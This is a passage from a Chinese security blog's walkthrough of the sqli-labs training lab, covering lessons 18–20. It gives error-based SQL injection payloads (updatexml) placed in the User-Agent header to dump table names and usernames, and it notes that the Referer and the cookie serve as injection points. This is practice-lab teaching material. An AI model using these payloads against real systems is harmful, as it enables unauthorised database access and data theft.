<p>注入点在 user-agent, 且用户名密码必须正确<br>
注意：闭合之前的部分必须为空，很恶心<br>
’ or updatexml (1,concat (0x7e,(select group_concat (table_name) from information_schema.tables where table_schema=database ())),1) or’</p>
<p>最后:<br>
’ or updatexml(1,concat(0x7e,(select group_concat(concat(username))from security.users)),1) or’</p>
<h2 id="less19"><a class="markdownIt-Anchor" href="#less19">#</a> less19</h2>
<p>与 18 一样，注入点在 referer</p>
<h2 id="less20"><a class="markdownIt-Anchor" href="#less20">#</a> less20</h2>
<p>输入正确的用户名和密码，抓到两个包，get 包里有 cookie, 注入点在 cookie</p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-05-12 00:57:34" itemprop="dateModified" datetime="2023-05-12T00:57:34+08:00">2023-05-12</time>
  </span>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>hq185187 <i class="ic i-at"><em>@</em></i>welcome to my blog
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://hq185187.github.io/2023/04/28/sqli-labs/" title="Sqli-labs靶场通关">https://hq185187.github.io/2023/04/28/sqli-labs/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/04/27/unserialize-labs/" itemprop="url" rel="prev" data-background-image="&#x2F;assets&#x2F;15.jpg" title="Unserialize-labs">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Unserialize-labs</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="next" data-background-image="&#x2F;assets&#x2F;1.jpg" title="命令执行漏洞及绕过方法">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>命令执行漏洞及绕过方法</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%88%96%E8%80%85%E6%95%B0%E5%AD%97%E5%9E%8B"><span class="toc-number">1.</span> <span class="toc-text"> 怎么判断字符型或者数字型？</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less1"><span class="toc-number"></span> <span class="toc-text"> less1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less2"><span class="toc-number"></span> <span class="toc-text"> less2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less3"><span class="toc-number"></span> <span class="toc-text"> less3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less4"><span class="toc-number"></span> <span class="toc-text"> less4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less5-%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="toc-number"></span> <span class="toc-text"> less5 报错注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1updatexml%E5%87%BD%E6%95%B0"><span class="toc-number">1.</span> <span class="toc-text"> 1.updatexml 函数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1%E5%8F%AF%E4%BB%A5%E7%94%A8limit%E8%A7%A3%E5%86%B3limit-01-11-21-31"><span class="toc-number">1.1.</span> <span class="toc-text"> 1. 可以用 limit 解决，limit 0,1 1,1 2,1 3,1</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2%E5%8A%A0%E4%B8%AAgroup_concat%E8%A7%A3%E5%86%B3"><span class="toc-number">1.2.</span> <span class="toc-text"> 2. 加个 group_concat 解决</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3substr%E6%96%B9%E6%B3%95"><span class="toc-number">1.3.</span> <span class="toc-text"> 3.substr 方法</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2extractvalue%E5%87%BD%E6%95%B0"><span class="toc-number">2.</span> <span class="toc-text"> 2.extractvalue 函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less6"><span class="toc-number">3.</span> <span class="toc-text"> less6</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#less7"><span class="toc-number">4.</span> <span class="toc-text"> less7</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less8"><span class="toc-number"></span> <span class="toc-text"> less8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less9"><span class="toc-number"></span> <span class="toc-text"> less9</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less-10"><span class="toc-number"></span> <span class="toc-text"> less-10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less11"><span class="toc-number"></span> <span class="toc-text"> less11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less12"><span class="toc-number"></span> <span class="toc-text"> less12</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less13"><span class="toc-number"></span> <span class="toc-text"> less13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less14"><span class="toc-number"></span> <span class="toc-text"> less14</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less15"><span class="toc-number"></span> <span class="toc-text"> less15</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less16"><span class="toc-number"></span> <span class="toc-text"> less16</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less17"><span class="toc-number"></span> <span class="toc-text"> less17</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less18"><span class="toc-number"></span> <span class="toc-text"> less18</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less19"><span class="toc-number"></span> <span class="toc-text"> less19</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#less20"><span class="toc-number"></span> <span class="toc-text"> less20</span></a>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2023/04/28/sqli-labs/" rel="bookmark" title="Sqli-labs靶场通关">Sqli-labs靶场通关</a></li><li><a href="/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" rel="bookmark" title="SQL注入绕过">SQL注入绕过</a></li><li><a href="/2023/05/07/sql%E6%B3%A8%E5%85%A5%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8/" rel="bookmark" title="时间盲注">时间盲注</a></li><li><a href="/2023/06/21/MySQL%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6/" rel="bookmark" title="Mysql主从复制">Mysql主从复制</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="hq185187"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">hq185187</p>
  <div class="description" itemprop="description">不定时更新web安全相关知识</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">26</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2hxMTg1MTg3" title="https:&#x2F;&#x2F;github.com&#x2F;hq185187"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2023/04/27/unserialize-labs/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2023/04/28/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/26/%E6%97%A0%E5%AD%97%E6%AF%8Drce/" title="无字母数字rce">无字母数字rce</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/04/29/sql%E6%B3%A8%E5%85%A5%E7%9A%84%E7%BB%95%E8%BF%87/" title="SQL注入绕过">SQL注入绕过</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/30/SSRF/" title="SSRF绕过">SSRF绕过</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/05/03/request%E5%BA%93/" title="requests学习">requests学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/NSSCTF/" title="分类于 NSSCTF精选">NSSCTF精选</a>
</div>

    <span><a href="/2023/06/04/nssctf3/" title="NSSCTF3">NSSCTF3</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/27/unserialize-labs/" title="Unserialize-labs">Unserialize-labs</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/08/%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="原生类反序列化学习">原生类反序列化学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/06/21/%E5%8F%8D%E5%BC%B9shell%E5%AD%A6%E4%B9%A0/" title="反弹shell学习">反弹shell学习</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2023/04/30/md5/" title="MD5绕过总结">MD5绕过总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/sql/" title="分类于 SQL注入">SQL注入</a>
</div>

    <span><a href="/2023/04/28/sqli-labs/" title="Sqli-labs靶场通关">Sqli-labs靶场通关</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">hq185187 @ 不良人天藏星</span>
  </div>
  <div class="count">
    <span class="post-meta-item-icon">
      <i class="ic i-chart-area"></i>
    </span>
    <span title="站点总字数">149k 字</span>

    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="ic i-coffee"></i>
    </span>
    <span title="站点阅读时长">2:16</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2023/04/28/sqli-labs/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
